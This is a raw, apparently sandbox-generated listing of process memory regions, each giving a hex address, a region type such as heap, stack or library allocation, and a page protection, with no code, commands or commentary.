page read and write
1110000
unkown
page read and write
5681000
heap
page read and write
C625000
unkown
page read and write
24ABA7DC000
heap
page read and write
5E59000
heap
page read and write
5121000
heap
page read and write
24ABAADB000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
24ABAADB000
heap
page read and write
35F7000
heap
page read and write
7FF5D7641000
unkown
page readonly
24ABAADE000
heap
page read and write
11E0000
unkown
page read and write
3444000
heap
page read and write
24ABAB13000
heap
page read and write
24ABAAE3000
heap
page read and write
24ABAADB000
heap
page read and write
1100000
unkown
page read and write
5121000
heap
page read and write
3074000
heap
page read and write
4D70000
trusted library allocation
page read and write
1190000
unkown
page read and write
8F10000
unkown
page read and write
22CBCB5B000
heap
page read and write
8B70000
unkown
page read and write
32DC000
heap
page read and write
1110000
unkown
page read and write
22CBCB93000
heap
page read and write
24ABAA64000
heap
page read and write
7C31000
unkown
page read and write
2B44000
heap
page read and write
5681000
heap
page read and write
5AF8000
heap
page read and write
743E000
stack
page read and write
841000
stack
page read and write
5E80000
heap
page read and write
24ABAB3B000
heap
page read and write
51B1000
heap
page read and write
24ABAADB000
heap
page read and write
55F8000
heap
page read and write
5AF8000
heap
page read and write
24ABA89E000
heap
page read and write
20E76596000
heap
page read and write
7FF5D776F000
unkown
page readonly
8980000
unkown
page read and write
24ABA897000
heap
page read and write
5121000
heap
page read and write
5AF8000
heap
page read and write
5121000
heap
page read and write
24ABA4A6000
heap
page read and write
1190000
unkown
page read and write
5681000
heap
page read and write
5AF8000
heap
page read and write
7FF5D76AF000
unkown
page readonly
22CBCBAB000
heap
page read and write
5121000
heap
page read and write
22CBC627000
heap
page read and write
5619000
heap
page read and write
3489000
stack
page read and write
24ABAB2B000
heap
page read and write
22CBCBD3000
heap
page read and write
25C0000
trusted library allocation
page read and write
1100000
unkown
page read and write
24ABAACB000
heap
page read and write
1170000
unkown
page read and write
11D0000
unkown
page read and write
5614000
heap
page read and write
24ABAA96000
heap
page read and write
3074000
heap
page read and write
B5C6000
unkown
page read and write
9ADB000
unkown
page read and write
24ABA322000
heap
page read and write
1170000
unkown
page read and write
5121000
heap
page read and write
24ABA7CB000
heap
page read and write
7FF5D762F000
unkown
page readonly
22CBCB5B000
heap
page read and write
5AF8000
heap
page read and write
1611000
heap
page read and write
24ABA7CF000
heap
page read and write
A1AF000
stack
page read and write
24ABAACB000
heap
page read and write
24ABAAC3000
heap
page read and write
437000
unkown
page readonly
24ABAADB000
heap
page read and write
C65E000
unkown
page read and write
24ABA7E4000
heap
page read and write
2B44000
heap
page read and write
674000
heap
page read and write
5681000
heap
page read and write
24ABAA3B000
heap
page read and write
24ABA86A000
heap
page read and write
22CBCB5B000
heap
page read and write
5121000
heap
page read and write
4D70000
trusted library allocation
page read and write
24ABAB2B000
heap
page read and write
9E2D000
stack
page read and write
4E0000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
22CBCB43000
heap
page read and write
24ABAADB000
heap
page read and write
5E59000
heap
page read and write
24ABAAA1000
heap
page read and write
5AF8000
heap
page read and write
32E2000
heap
page read and write
4E70000
remote allocation
page read and write
24ABAADB000
heap
page read and write
4D70000
trusted library allocation
page read and write
7FF5D71EF000
unkown
page readonly
10E0000
trusted library allocation
page read and write
24ABAA92000
heap
page read and write
24ABAADB000
heap
page read and write
7B00000
unkown
page readonly
24ABAB53000
heap
page read and write
24ABA7E9000
heap
page read and write
24ABAAFB000
heap
page read and write
4DE1000
heap
page read and write
5121000
heap
page read and write
1170000
unkown
page read and write
10E72000
heap
page read and write
24ABAAC3000
heap
page read and write
ED0000
trusted library allocation
page read and write
24ABAB0B000
heap
page read and write
5121000
heap
page read and write
640000
direct allocation
page read and write
1190000
unkown
page read and write
4F4E000
stack
page read and write
5121000
heap
page read and write
1190000
unkown
page read and write
1190000
unkown
page read and write
24ABAACB000
heap
page read and write
22CBCB43000
heap
page read and write
40D000
unkown
page read and write
8F10000
unkown
page read and write
24ABAAE3000
heap
page read and write
2B44000
heap
page read and write
24ABAB3B000
heap
page read and write
22CBCB63000
heap
page read and write
970000
heap
page read and write
24ABAB13000
heap
page read and write
65B000
unkown
page readonly
6E17000
heap
page read and write
24ABAAF3000
heap
page read and write
24ABAADB000
heap
page read and write
24ABAACB000
heap
page read and write
22CBCB93000
heap
page read and write
24ABAAC3000
heap
page read and write
24ABAADB000
heap
page read and write
5121000
heap
page read and write
8DCA000
stack
page read and write
AA0000
trusted library allocation
page read and write
8F10000
unkown
page read and write
22CBCB43000
heap
page read and write
8310000
heap
page read and write
24ABAA72000
heap
page read and write
33D0000
trusted library allocation
page read and write
2B44000
heap
page read and write
8B70000
unkown
page read and write
22CBCB63000
heap
page read and write
1230000
trusted library allocation
page read and write
441000
unkown
page read and write
9189000
trusted library allocation
page read and write
674000
heap
page read and write
24ABAAFB000
heap
page read and write
22CBCB7B000
heap
page read and write
24ABAAE3000
heap
page read and write
77A2000
unkown
page read and write
22CBCB73000
heap
page read and write
5310000
unkown
page read and write
24ABAAB3000
heap
page read and write
734D000
stack
page read and write
25C0000
trusted library allocation
page read and write
11C0000
unkown
page read and write
33AC000
heap
page read and write
7FF5D77E9000
unkown
page readonly
5DFC000
trusted library allocation
page read and write
20E76581000
heap
page read and write
24ABAAE3000
heap
page read and write
24AB8970000
heap
page read and write
6EE0000
heap
page execute and read and write
91BD000
trusted library allocation
page read and write
22CBCB7B000
heap
page read and write
22CBAA90000
heap
page read and write
24ABA7FE000
heap
page read and write
22CBCBAB000
heap
page read and write
1110000
unkown
page read and write
22CBCB73000
heap
page read and write
5121000
heap
page read and write
24ABAB43000
heap
page read and write
216E000
stack
page read and write
1100000
unkown
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
7145000
heap
page execute and read and write
1100000
unkown
page read and write
7E58000
stack
page read and write
35D6000
heap
page read and write
5121000
heap
page read and write
2A50000
trusted library allocation
page read and write
1141000
unkown
page read and write
70E0000
trusted library allocation
page read and write
5121000
heap
page read and write
56FF000
stack
page read and write
8F10000
unkown
page read and write
5121000
heap
page read and write
35D6000
heap
page read and write
24ABAAE3000
heap
page read and write
22CBCB63000
heap
page read and write
2A50000
trusted library allocation
page read and write
7080000
trusted library allocation
page read and write
22CBCBAB000
heap
page read and write
24ABAA83000
heap
page read and write
31C0000
heap
page read and write
3410000
stack
page read and write
33AC000
heap
page read and write
5121000
heap
page read and write
24ABAADB000
heap
page read and write
24ABAAE3000
heap
page read and write
57F8000
unkown
page read and write
8F10000
unkown
page read and write
8B70000
unkown
page read and write
32CC000
heap
page read and write
2B44000
heap
page read and write
8980000
unkown
page read and write
7DBC000
stack
page read and write
5121000
heap
page read and write
5681000
heap
page read and write
32B6000
heap
page read and write
8980000
unkown
page read and write
22CBCBC3000
heap
page read and write
24ABAAFB000
heap
page read and write
24ABAB13000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
25C0000
trusted library allocation
page read and write
24ABAA96000
heap
page read and write
4B3C000
stack
page read and write
24ABAAE3000
heap
page read and write
8980000
unkown
page read and write
5E8C000
heap
page read and write
5EDB000
stack
page read and write
24ABAAE3000
heap
page read and write
7FF5D66E3000
unkown
page readonly
AA0E000
unkown
page read and write
2A50000
trusted library allocation
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
7FF5D77A8000
unkown
page readonly
4AF0000
trusted library section
page read and write
7FF5D76C8000
unkown
page readonly
2B44000
heap
page read and write
24ABAAC3000
heap
page read and write
2B44000
heap
page read and write
30D0000
trusted library allocation
page read and write
22CBCB5B000
heap
page read and write
24ABAA8A000
heap
page read and write
6BBD000
stack
page read and write
22CBC702000
heap
page read and write
1190000
unkown
page read and write
5121000
heap
page read and write
24ABAAC3000
heap
page read and write
24ABAA92000
heap
page read and write
24ABA888000
heap
page read and write
26C9000
heap
page read and write
24ABAA9E000
heap
page read and write
33AC000
heap
page read and write
5121000
heap
page read and write
44F1000
heap
page read and write
22CBCBC3000
heap
page read and write
22CBCBD3000
heap
page read and write
24ABAACB000
heap
page read and write
55FC000
heap
page read and write
24ABAACB000
heap
page read and write
24ABA7CD000
heap
page read and write
24ABAB53000
heap
page read and write
22CBCB4B000
heap
page read and write
8A70000
unkown
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
7FF5D7837000
unkown
page readonly
3C50000
unkown
page read and write
5121000
heap
page read and write
24ABAB23000
heap
page read and write
1190000
unkown
page read and write
7FF5D7202000
unkown
page readonly
11C0000
unkown
page read and write
3B00000
unkown
page read and write
24ABAAE3000
heap
page read and write
5121000
heap
page read and write
22CBCB7B000
heap
page read and write
3074000
heap
page read and write
4250000
heap
page read and write
35D1000
unkown
page read and write
5121000
heap
page read and write
24ABAACB000
heap
page read and write
8980000
unkown
page read and write
24ABAB8B000
heap
page read and write
24ABA88A000
heap
page read and write
7FF5D781A000
unkown
page readonly
24ABA7D2000
heap
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
5681000
heap
page read and write
25C0000
trusted library allocation
page read and write
25C0000
trusted library allocation
page read and write
22CBCB93000
heap
page read and write
4DAD000
stack
page read and write
5121000
heap
page read and write
7FF5D765F000
unkown
page readonly
24ABAADB000
heap
page read and write
7FF5D72C8000
unkown
page readonly
7FF5D72FB000
unkown
page readonly
3010000
trusted library allocation
page read and write
2B45000
heap
page read and write
2B44000
heap
page read and write
5AF8000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
4CE1000
heap
page read and write
24ABAB53000
heap
page read and write
24ABAAFB000
heap
page read and write
24ABAAB3000
heap
page read and write
5681000
heap
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
7FF5D7648000
unkown
page readonly
24ABAAFB000
heap
page read and write
24ABAA3B000
heap
page read and write
AA40000
unkown
page read and write
24ABAAE3000
heap
page read and write
410000
heap
page read and write
ED0000
trusted library allocation
page read and write
3000000
unkown
page read and write
24ABAAC3000
heap
page read and write
5121000
heap
page read and write
22CBC6D7000
heap
page read and write
B559000
stack
page read and write
22CBCB7B000
heap
page read and write
5681000
heap
page read and write
2B44000
heap
page read and write
24ABAB23000
heap
page read and write
24ABA884000
heap
page read and write
75EB000
heap
page read and write
33AC000
heap
page read and write
22CBCB43000
heap
page read and write
5121000
heap
page read and write
7FF5CE33D000
unkown
page readonly
35ED000
heap
page read and write
22CBCB5B000
heap
page read and write
24ABA7C4000
heap
page read and write
22CBCB5B000
heap
page read and write
8B70000
unkown
page read and write
AA0000
trusted library allocation
page read and write
ACE000
stack
page read and write
5121000
heap
page read and write
1190000
unkown
page read and write
24ABA7A8000
heap
page read and write
8210000
heap
page read and write
330E000
stack
page read and write
3000000
unkown
page read and write
5681000
heap
page read and write
7FF5D7450000
unkown
page readonly
4CE1000
heap
page read and write
5121000
heap
page read and write
22CBCB5B000
heap
page read and write
24ABAB13000
heap
page read and write
5121000
heap
page read and write
24ABAAC3000
heap
page read and write
1190000
unkown
page read and write
9B89000
unkown
page read and write
32C6000
heap
page read and write
33EE000
stack
page read and write
5AF8000
heap
page read and write
5AF8000
heap
page read and write
10EB1000
unkown
page read and write
4CB2000
trusted library allocation
page read and write
A237000
unkown
page read and write
2A50000
trusted library allocation
page read and write
24ABAAC3000
heap
page read and write
10EC6000
unkown
page read and write
8339000
trusted library allocation
page read and write
58A0000
unkown
page read and write
32DE000
heap
page read and write
7FF848ECC000
trusted library allocation
page execute and read and write
24ABA7D8000
heap
page read and write
A273000
unkown
page read and write
24ABAA66000
heap
page read and write
8B70000
unkown
page read and write
24ABAB2B000
heap
page read and write
22CBCB5B000
heap
page read and write
22CBCB5B000
heap
page read and write
24ABAACB000
heap
page read and write
24ABAA66000
heap
page read and write
10E70000
heap
page read and write
5121000
heap
page read and write
22CBCB7B000
heap
page read and write
24ABAAF3000
heap
page read and write
ED0000
trusted library allocation
page read and write
1FF73550000
heap
page execute and read and write
22CBCBBB000
heap
page read and write
5121000
heap
page read and write
1190000
unkown
page read and write
1100000
unkown
page read and write
25C0000
trusted library allocation
page read and write
24ABAAF3000
heap
page read and write
7FF5D72D7000
unkown
page readonly
5121000
heap
page read and write
5121000
heap
page read and write
24ABA88C000
heap
page read and write
2B44000
heap
page read and write
22CBCB4B000
heap
page read and write
2B44000
heap
page read and write
761E000
unkown
page read and write
5AF8000
heap
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
1FF71270000
heap
page read and write
22CBCB43000
heap
page read and write
3070000
trusted library allocation
page read and write
33AC000
heap
page read and write
83C000
stack
page read and write
77D0000
trusted library allocation
page read and write
2B44000
heap
page read and write
24ABAB13000
heap
page read and write
3510000
trusted library allocation
page read and write
8B70000
unkown
page read and write
22CBCBA3000
heap
page read and write
4B10000
heap
page read and write
35BA000
heap
page read and write
3444000
heap
page read and write
2DE4000
heap
page read and write
5AF8000
heap
page read and write
5681000
heap
page read and write
C5F0000
unkown
page read and write
7FF5D7745000
unkown
page readonly
24ABA893000
heap
page read and write
24ABAAE3000
heap
page read and write
9ABD000
unkown
page read and write
24ABA7EB000
heap
page read and write
8B70000
unkown
page read and write
BB9C000
stack
page read and write
7FF5D75BF000
unkown
page readonly
7FF5D76CD000
unkown
page readonly
5121000
heap
page read and write
4A16000
unkown
page read and write
8B70000
unkown
page read and write
24ABAADE000
heap
page read and write
5E76000
heap
page read and write
7FF5D71E6000
unkown
page readonly
1190000
unkown
page read and write
22CBCB5B000
heap
page read and write
22CBCBAB000
heap
page read and write
22CBCBBB000
heap
page read and write
7FF5D7669000
unkown
page readonly
11D0000
unkown
page read and write
22CBCB63000
heap
page read and write
3124000
heap
page read and write
7FF5D7396000
unkown
page readonly
24ABAADB000
heap
page read and write
24ABAACB000
heap
page read and write
5121000
heap
page read and write
24ABAAF3000
heap
page read and write
24ABAAE3000
heap
page read and write
ED0000
trusted library allocation
page read and write
3EE7000
unkown
page read and write
5AF8000
heap
page read and write
7FF5D77B6000
unkown
page readonly
24ABA7EA000
heap
page read and write
42CA000
heap
page read and write
7B60000
unkown
page readonly
24ABAAF3000
heap
page read and write
1250000
unkown
page read and write
E35000
heap
page read and write
5121000
heap
page read and write
86D0000
unkown
page readonly
3CD0000
heap
page read and write
4E1C000
heap
page read and write
1230000
trusted library allocation
page read and write
1110000
unkown
page read and write
7FF5D7289000
unkown
page readonly
24ABAAC3000
heap
page read and write
24ABA871000
heap
page read and write
7FF848ED0000
trusted library allocation
page execute and read and write
303B000
stack
page read and write
5121000
heap
page read and write
22CBCB93000
heap
page read and write
24ABA802000
heap
page read and write
24ABAA94000
heap
page read and write
5121000
heap
page read and write
7770000
trusted library allocation
page read and write
33D0000
trusted library allocation
page read and write
A74000
heap
page read and write
11C0000
unkown
page read and write
24ABACEA000
heap
page read and write
91E4000
trusted library allocation
page read and write
24ABAADB000
heap
page read and write
52F0000
heap
page read and write
24ABAAF3000
heap
page read and write
22CBCB4B000
heap
page read and write
EF1837C000
stack
page read and write
5121000
heap
page read and write
24ABAB13000
heap
page read and write
3530000
heap
page read and write
929E000
trusted library allocation
page read and write
5121000
heap
page read and write
9FC1000
trusted library allocation
page read and write
24ABA89E000
heap
page read and write
711D000
stack
page read and write
7605000
unkown
page read and write
5121000
heap
page read and write
22CBCB43000
heap
page read and write
4E70000
remote allocation
page read and write
8B70000
unkown
page read and write
7FF5D7257000
unkown
page readonly
5121000
heap
page read and write
24ABAA67000
heap
page read and write
B90000
heap
page read and write
8770000
trusted library section
page read and write
7FF848E20000
trusted library allocation
page read and write
24ABA7FE000
heap
page read and write
3000000
unkown
page read and write
8F10000
unkown
page read and write
5121000
heap
page read and write
7FF5D719C000
unkown
page readonly
24ABAAFB000
heap
page read and write
24ABAACB000
heap
page read and write
5680000
unkown
page read and write
5800000
unkown
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
4CE1000
heap
page read and write
3124000
heap
page read and write
C800000
unkown
page read and write
A40E000
unkown
page read and write
3000000
trusted library allocation
page read and write
5AF8000
heap
page read and write
22CBCBDB000
heap
page read and write
5E77000
heap
page read and write
11C0000
unkown
page read and write
C0BA000
stack
page read and write
22CBCB7B000
heap
page read and write
24ABAB23000
heap
page read and write
5121000
heap
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
24ABAA91000
heap
page read and write
5681000
heap
page read and write
2B44000
heap
page read and write
24ABAAC3000
heap
page read and write
5121000
heap
page read and write
6E0D000
heap
page read and write
5121000
heap
page read and write
24ABAAE3000
heap
page read and write
5121000
heap
page read and write
24ABA887000
heap
page read and write
8B70000
unkown
page read and write
1100000
unkown
page read and write
8F10000
unkown
page read and write
4948000
trusted library allocation
page read and write
7FF5D71DA000
unkown
page readonly
5121000
heap
page read and write
8B70000
unkown
page read and write
22CBCB43000
heap
page read and write
24ABA7FE000
heap
page read and write
7FF5D7740000
unkown
page readonly
8B70000
unkown
page read and write
24ABAA69000
heap
page read and write
2F80000
unkown
page read and write
950000
heap
page read and write
24ABA897000
heap
page read and write
6CFE000
stack
page read and write
5681000
heap
page read and write
24ABA863000
heap
page read and write
24ABA7CF000
heap
page read and write
2B44000
heap
page read and write
22CBCB43000
heap
page read and write
5121000
heap
page read and write
8980000
unkown
page read and write
24ABAAB3000
heap
page read and write
11A0000
unkown
page read and write
5681000
heap
page read and write
8F10000
unkown
page read and write
8B70000
unkown
page read and write
7FF5D7458000
unkown
page readonly
24ABAAAB000
heap
page read and write
5617000
heap
page read and write
22CBCB63000
heap
page read and write
33AC000
heap
page read and write
11C0000
unkown
page read and write
11C0000
unkown
page read and write
24ABAAFB000
heap
page read and write
5AF8000
heap
page read and write
874A000
trusted library allocation
page read and write
8B70000
unkown
page read and write
50E1000
heap
page read and write
1170000
unkown
page read and write
24ABAA94000
heap
page read and write
5121000
heap
page read and write
9A84000
unkown
page read and write
8B70000
unkown
page read and write
24ABAAFB000
heap
page read and write
A233000
unkown
page read and write
24ABAACB000
heap
page read and write
11D0000
unkown
page read and write
24ABAA43000
heap
page read and write
22CBCB43000
heap
page read and write
24ABAB0B000
heap
page read and write
BA0000
trusted library allocation
page read and write
8B70000
unkown
page read and write
7FF5D74FA000
unkown
page readonly
24ABAAE3000
heap
page read and write
1110000
unkown
page read and write
1100000
unkown
page read and write
24ABAA4B000
heap
page read and write
A10000
heap
page read and write
32CB000
heap
page read and write
10ECA000
unkown
page read and write
768E000
unkown
page read and write
4F10000
trusted library allocation
page read and write
2B44000
heap
page read and write
24ABAAE3000
heap
page read and write
24ABAAC3000
heap
page read and write
44F0000
heap
page read and write
32B6000
heap
page read and write
5121000
heap
page read and write
24ABAACB000
heap
page read and write
24ABAAFB000
heap
page read and write
5AF8000
heap
page read and write
2F5B000
heap
page read and write
5121000
heap
page read and write
7FF5D71A6000
unkown
page readonly
24ABAAC3000
heap
page read and write
22CBCB5B000
heap
page read and write
24ABAACB000
heap
page read and write
A4473FB000
stack
page read and write
22CBCB63000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
24ABA89E000
heap
page read and write
22CBCB63000
heap
page read and write
2B44000
heap
page read and write
24ABA7F2000
heap
page read and write
C483000
unkown
page read and write
24ABA888000
heap
page read and write
EF8000
heap
page read and write
7DF4FCEC0000
trusted library allocation
page execute and read and write
463A000
heap
page read and write
1100000
unkown
page read and write
22CBCB63000
heap
page read and write
323B000
stack
page read and write
2F80000
unkown
page read and write
57F1000
trusted library allocation
page read and write
24ABAAC3000
heap
page read and write
5121000
heap
page read and write
33AC000
heap
page read and write
5121000
heap
page read and write
9AC3000
unkown
page read and write
EB5000
stack
page read and write
11A0000
unkown
page read and write
1170000
unkown
page read and write
9174000
trusted library allocation
page read and write
427F000
stack
page read and write
24AB8810000
heap
page read and write
35D3000
unkown
page read and write
5121000
heap
page read and write
22CBCB7B000
heap
page read and write
7FF5D7795000
unkown
page readonly
5121000
heap
page read and write
5121000
heap
page read and write
24ABAAE3000
heap
page read and write
22CBCB4B000
heap
page read and write
4A71000
unkown
page read and write
1190000
unkown
page read and write
5121000
heap
page read and write
19D000
heap
page read and write
24ABAA96000
heap
page read and write
5AF8000
heap
page read and write
22CBCB63000
heap
page read and write
22CBCB8B000
heap
page read and write
24ABAA71000
heap
page read and write
5681000
heap
page read and write
24ABA884000
heap
page read and write
24ABAAFB000
heap
page read and write
5121000
heap
page read and write
22CBCB43000
heap
page read and write
19A000
stack
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
22CBCB43000
heap
page read and write
5121000
heap
page read and write
A82000
heap
page read and write
8B70000
unkown
page read and write
22CBCB73000
heap
page read and write
3160000
unkown
page read and write
22CBCB4B000
heap
page read and write
11C0000
unkown
page read and write
2B44000
heap
page read and write
24ABAACB000
heap
page read and write
24ABAAF3000
heap
page read and write
5121000
heap
page read and write
401000
unkown
page execute and write copy
5121000
heap
page read and write
35F7000
heap
page read and write
8F10000
unkown
page read and write
11D0000
unkown
page read and write
7FF5D720A000
unkown
page readonly
2B44000
heap
page read and write
4795000
heap
page execute and read and write
140000
heap
page read and write
22CBCBAB000
heap
page read and write
659000
unkown
page read and write
22CBCB43000
heap
page read and write
22CBCB5B000
heap
page read and write
5121000
heap
page read and write
50E1000
heap
page read and write
24ABAAFD000
heap
page read and write
1190000
unkown
page read and write
5121000
heap
page read and write
8F10000
unkown
page read and write
24ABA7C4000
heap
page read and write
7FF5D7797000
unkown
page readonly
7FF5D7385000
unkown
page readonly
22CBCB5B000
heap
page read and write
345C000
heap
page read and write
24ABA871000
heap
page read and write
7830000
trusted library allocation
page read and write
2F7E000
stack
page read and write
5121000
heap
page read and write
24ABAADB000
heap
page read and write
32BF000
heap
page read and write
5618000
heap
page read and write
24ABAAFB000
heap
page read and write
5121000
heap
page read and write
4230000
heap
page read and write
1190000
unkown
page read and write
7750000
trusted library allocation
page read and write
41EA000
heap
page read and write
8F10000
unkown
page read and write
8980000
unkown
page read and write
EBF000
stack
page read and write
41DA000
heap
page read and write
22CBCBA3000
heap
page read and write
33AC000
heap
page read and write
5121000
heap
page read and write
24ABA7E9000
heap
page read and write
1230000
trusted library allocation
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
8B70000
unkown
page read and write
5AF7000
heap
page read and write
24ABAAC3000
heap
page read and write
5121000
heap
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
49D6000
unkown
page read and write
5121000
heap
page read and write
24ABA7D5000
heap
page read and write
560D000
heap
page read and write
11D0000
unkown
page read and write
5681000
heap
page read and write
24ABAAC3000
heap
page read and write
9176000
trusted library allocation
page read and write
22CBCB5B000
heap
page read and write
4AD0000
trusted library allocation
page read and write
24ABAB23000
heap
page read and write
3043000
heap
page read and write
5121000
heap
page read and write
7FF5D75F2000
unkown
page readonly
405000
unkown
page execute and read and write
91DE000
trusted library allocation
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
1141000
unkown
page read and write
5681000
heap
page read and write
545E000
unkown
page read and write
1190000
unkown
page read and write
40A000
unkown
page read and write
B80000
heap
page read and write
22CBCB63000
heap
page read and write
24AB88F0000
heap
page read and write
24ABA8A9000
heap
page read and write
5121000
heap
page read and write
1170000
unkown
page read and write
7FF5D74C3000
unkown
page readonly
24ABAB5B000
heap
page read and write
24ABAACB000
heap
page read and write
5121000
heap
page read and write
3280000
unkown
page read and write
5681000
heap
page read and write
5681000
heap
page read and write
5AF8000
heap
page read and write
1190000
unkown
page read and write
24ABAAC3000
heap
page read and write
668C000
stack
page read and write
2B44000
heap
page read and write
A6E000
heap
page read and write
24ABA7CD000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
5020000
heap
page read and write
5681000
heap
page read and write
22CBCB63000
heap
page read and write
1170000
unkown
page read and write
24ABAAFB000
heap
page read and write
2BD0000
heap
page read and write
24ABAB53000
heap
page read and write
24ABAA64000
heap
page read and write
22CBCB5B000
heap
page read and write
24ABA7FE000
heap
page read and write
3124000
heap
page read and write
24ABAB0B000
heap
page read and write
22CBCB8B000
heap
page read and write
20E765BA000
heap
page read and write
C3CC000
stack
page read and write
8980000
unkown
page read and write
24ABAA3B000
heap
page read and write
32D6000
heap
page read and write
33AC000
heap
page read and write
2B44000
heap
page read and write
22CBCBD3000
heap
page read and write
8B70000
unkown
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
22CBCB8B000
heap
page read and write
400000
unkown
page readonly
22CBCBA3000
heap
page read and write
22CBCBDB000
heap
page read and write
401000
unkown
page execute read
24ABAA6C000
heap
page read and write
5121000
heap
page read and write
1190000
unkown
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
5E80000
heap
page read and write
7FF5D783B000
unkown
page readonly
24ABAAF3000
heap
page read and write
7FF5D7452000
unkown
page readonly
22CBCB63000
heap
page read and write
769A000
unkown
page read and write
598E000
stack
page read and write
8B70000
unkown
page read and write
3591000
heap
page read and write
7FF848E1D000
trusted library allocation
page execute and read and write
5121000
heap
page read and write
22CBCB5B000
heap
page read and write
22CBCB43000
heap
page read and write
4210000
trusted library allocation
page read and write
EF0000
heap
page read and write
46AC000
stack
page read and write
11D0000
unkown
page read and write
5120000
unkown
page read and write
5121000
heap
page read and write
33AC000
heap
page read and write
1170000
unkown
page read and write
22CBCB5B000
heap
page read and write
35FA000
unkown
page read and write
22CBCB93000
heap
page read and write
24ABA884000
heap
page read and write
22CBCB8B000
heap
page read and write
24ABAA6C000
heap
page read and write
24ABAAE3000
heap
page read and write
35B0000
unkown
page read and write
1FF71279000
heap
page read and write
33AC000
heap
page read and write
5E59000
heap
page read and write
32CC000
heap
page read and write
11D0000
unkown
page read and write
24ABAAF3000
heap
page read and write
24ABAAB3000
heap
page read and write
AA9F000
unkown
page read and write
11D0000
unkown
page read and write
24ABAAAA000
heap
page read and write
2B44000
heap
page read and write
6E41000
heap
page read and write
24ABAA5D000
heap
page read and write
22CBCB8B000
heap
page read and write
1100000
unkown
page read and write
5121000
heap
page read and write
9820000
unkown
page read and write
AA01000
unkown
page read and write
66CE000
stack
page read and write
400000
unkown
page readonly
24ABA7FE000
heap
page read and write
32E7000
heap
page read and write
24ABAB13000
heap
page read and write
3E56000
unkown
page read and write
3170000
unkown
page read and write
3000000
unkown
page read and write
3444000
heap
page read and write
347A000
heap
page read and write
24ABAACB000
heap
page read and write
24ABAA64000
heap
page read and write
8F10000
unkown
page read and write
24ABAA5B000
heap
page read and write
22CBCB4B000
heap
page read and write
7FF5D77C7000
unkown
page readonly
3000000
unkown
page read and write
3000000
unkown
page read and write
4CE1000
heap
page read and write
346F000
heap
page read and write
24ABAACB000
heap
page read and write
24ABAADB000
heap
page read and write
8980000
unkown
page read and write
920A000
trusted library allocation
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
22CBCB4B000
heap
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
24ABAADB000
heap
page read and write
99C0000
unkown
page read and write
1100000
unkown
page read and write
5760000
heap
page read and write
22CBCBA3000
heap
page read and write
32A2000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
22CBCB5B000
heap
page read and write
24ABAAB3000
heap
page read and write
7654000
unkown
page read and write
1FF72C40000
trusted library section
page read and write
24ABAAE3000
heap
page read and write
24ABAAE3000
heap
page read and write
22CBCB43000
heap
page read and write
7FF5D710B000
unkown
page readonly
8B70000
unkown
page read and write
24ABAAE3000
heap
page read and write
5121000
heap
page read and write
9A98000
unkown
page read and write
24ABA874000
heap
page read and write
24ABAAE3000
heap
page read and write
7DF488CDD000
unkown
page readonly
1190000
unkown
page read and write
8CC0000
unkown
page read and write
22CBCB63000
heap
page read and write
30C0000
heap
page execute and read and write
8B70000
unkown
page read and write
31D0000
heap
page read and write
AA0000
trusted library allocation
page read and write
1190000
unkown
page read and write
24ABAA91000
heap
page read and write
24ABAACB000
heap
page read and write
7611000
unkown
page read and write
674000
heap
page read and write
350B000
heap
page read and write
3CEA000
heap
page read and write
22CBCB7B000
heap
page read and write
5121000
heap
page read and write
24ABA87D000
heap
page read and write
3444000
heap
page read and write
318B000
stack
page read and write
22CBCB93000
heap
page read and write
5121000
heap
page read and write
2DD0000
heap
page read and write
5121000
heap
page read and write
22CBCB63000
heap
page read and write
7FF5D723C000
unkown
page readonly
7B10000
heap
page read and write
82CE000
stack
page read and write
7FF5D752F000
unkown
page readonly
8495000
trusted library allocation
page read and write
24ABAAE3000
heap
page read and write
230F000
stack
page read and write
160D000
heap
page read and write
1190000
unkown
page read and write
114A000
unkown
page read and write
5AF8000
heap
page read and write
33D0000
trusted library allocation
page read and write
24ABAA64000
heap
page read and write
C472000
unkown
page read and write
24ABAAE0000
heap
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
5E7C000
heap
page read and write
8B70000
unkown
page read and write
22CBCB63000
heap
page read and write
8F10000
unkown
page read and write
5AF8000
heap
page read and write
1100000
unkown
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
11A0000
unkown
page read and write
22CBCB7D000
heap
page read and write
11E0000
unkown
page read and write
1190000
unkown
page read and write
20E765BA000
heap
page read and write
1100000
unkown
page read and write
22CBCB4B000
heap
page read and write
22CBCB63000
heap
page read and write
B4BF000
stack
page read and write
4A42000
trusted library allocation
page read and write
8F10000
unkown
page read and write
24ABAAC3000
heap
page read and write
33A5000
heap
page read and write
24ABAAE3000
heap
page read and write
22CBCB93000
heap
page read and write
8B70000
unkown
page read and write
4D7A000
heap
page read and write
7FF5D75A6000
unkown
page readonly
4F10000
trusted library allocation
page read and write
24ABAA66000
heap
page read and write
5681000
heap
page read and write
24ABAA4A000
heap
page read and write
C806000
unkown
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
AA0000
trusted library allocation
page read and write
5121000
heap
page read and write
4DA6000
trusted library allocation
page read and write
32FA000
heap
page read and write
5121000
heap
page read and write
B4D0000
unkown
page readonly
24ABA2E0000
heap
page read and write
24ABAA8A000
heap
page read and write
52DE000
stack
